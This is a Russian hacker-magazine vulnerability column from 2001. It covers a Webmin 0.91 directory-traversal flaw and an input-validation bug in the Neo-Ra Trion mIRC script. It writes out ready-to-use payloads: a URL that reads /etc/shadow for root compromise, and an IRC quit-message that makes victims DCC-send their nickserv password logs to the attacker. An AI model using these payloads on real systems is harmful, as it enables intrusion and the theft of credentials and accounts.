BugTraq

Xakep, номер #037, стр. 037-008-1

SideX (sidex@real.xakep.ru)

Проблемы с директориями Webmin'a

BT id 3698

Класс: ошибка ввода

Тип эксплойтинга: удаленный

Уязвимый продукт: Webmin Webmin 0.91 (http://www.webmin.com/webmin/)

Автор: A. Ramos aramos@aramos-test.prisacom.int

Дата 17.12.2001

Когда админ-приятель установил на свой сервер Webmin'a, общие знакомые заподозрили идею запуска free shell hosting'a в этом шаге - уж очень часто ломалась эта оболочка. Да и редко встретишь профессионального adm, кто бы пользовался шнягами типа Вебмина...

Для не ведавших доныне сути дырявой проги поясню, что Webmin - web-базированный интерфейс для администрирования *nix'а. Используя любой браузер, поддерживающий таблички и формы, можно модифицировать (создавать/удалять) юзерские аккаунты, мутить Apache, DNS, расшаривать файлы и т.д. Обычно Webmin успешно принимается всеми клонами *nix.

Баг начинается при неадекватной фильтрации последовательности "../" при веб-запросах, позволяющей реализовать атаку. Кроме того, если через Webmin можно совершать ряд серьезных настроек, он будет требовать root-привилегий в администрируемой *nix-системе. А там где r00t, там и полный доступ. Полный доступ к файлам системы, заряженной уязвимым софтом от Webmin'a. Также предположительно возможно редактирование файлов системы и их замена. Финальный результат - захват r00t привилегий. Эксплойта не нужно, просто забивается http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+http://etc/shadow. Баг правится в течение 30 секунд редактированием edit_action.cgi, код по адресу в BT. На сайте же проги, в момент постинга нашего багтрека, все еще покоилась дырявая 0.91 версия...

Мелкие пакости Neo-Ra Trion

Класс: ошибка проверки корректности

Тип эксплойтинга: удаленный

Уязвимый продукт: Neo-Ra Trion v 1.0 (www.neora.ru)

Автор: Unknow Haqsaz Grupp

Дата: 9.12.2001

Сложно найти более неблагодарное занятие, чем написание irc-скриптов (особенно под win-клиенты): чайник не оценит тебя $, т.к. все скрипты подобного рода бесплатны, а профессионал сразу отметит примитивность данного занятия. Но находятся люди, целые группы людей, кто лепит скрипты и плугины под mIRC. Наиболее известная группировка мирк-скриптеров в RU - NeoRa. Неизвестная хагруппа забросила увесистый камень в их огород...

Модифицированный Trion'ом mIRC сохраняет по умолчанию топики со всех посещенных каналов в topics.txt, а все обращения к nickserv - в nickserv.txt, соответственно. Проблема прячется в отсутствии проверки входящих данных на корректность. Нашедшие баг заявили, что наиболее эффективно клиент эксплойтится занесенной в topic канала фразой «} /server» (пробел) - вошедшие юзеры Trion'a будут моментально перекинуты на другой irc-сервис исполненной командой /server. По собственному же опыту пребывания на DALnet, замечу, что лично при мне было похищено более 5 ников путем занесения в quit-message " } /dcc send твой_ник $mircdirtextsnickserv.txt". В результате жертва отсылала по dcc свой ns-лог атакующему. Замечу, что был использован quit, т.к. далеко не у всех есть статусы (@) на многолюдных каналах, где пасутся юзверы дырявых скриптов ;). Баг более чем детский и забавный. В то же время он поддерживает нашего производителя: россияне лепят дыру, россияне же его находят.

Содержание  Вперед на стр. 037-008-2

ttfb: 3.1261444091797 ms